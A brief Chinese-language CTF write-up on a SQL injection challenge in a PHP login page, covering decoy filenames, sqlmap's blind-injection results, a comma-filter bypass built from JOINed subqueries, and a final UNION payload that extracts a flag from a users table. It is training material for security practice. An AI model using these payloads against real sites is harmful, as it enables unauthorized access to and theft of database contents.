忽悠人的路径
b68a89d1c4a097a9d863lb3ac45e8979.php(倒数第二位是L)
b68a89d1c4a097a9d8631b3ac45e8979.php(倒数第二位是1)
l0gin.php?id=1
login.php?id=1
检查应该是l0gin.php?id=1的id参数有注入
测试注入
- sqlmap测试出布尔和时间的盲注,但是却无法获取到数据
- 当sql语句错误时,输出你的输入,发现逗号被过滤了
逗号过滤
在sql注入中一般来说,无论是报错,盲注,还是联合注入都需要逗号。这道题没有输出错误信息,所以还是考虑联合注入和盲注。百度到绕过逗号过滤的方法https://www.cnblogs.com/i-honey/p/8203954.html
union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
最终payload
id=0'union+select+*+from+((select+flag_9c861b688330+from+users)a+join+(select+2)b)%23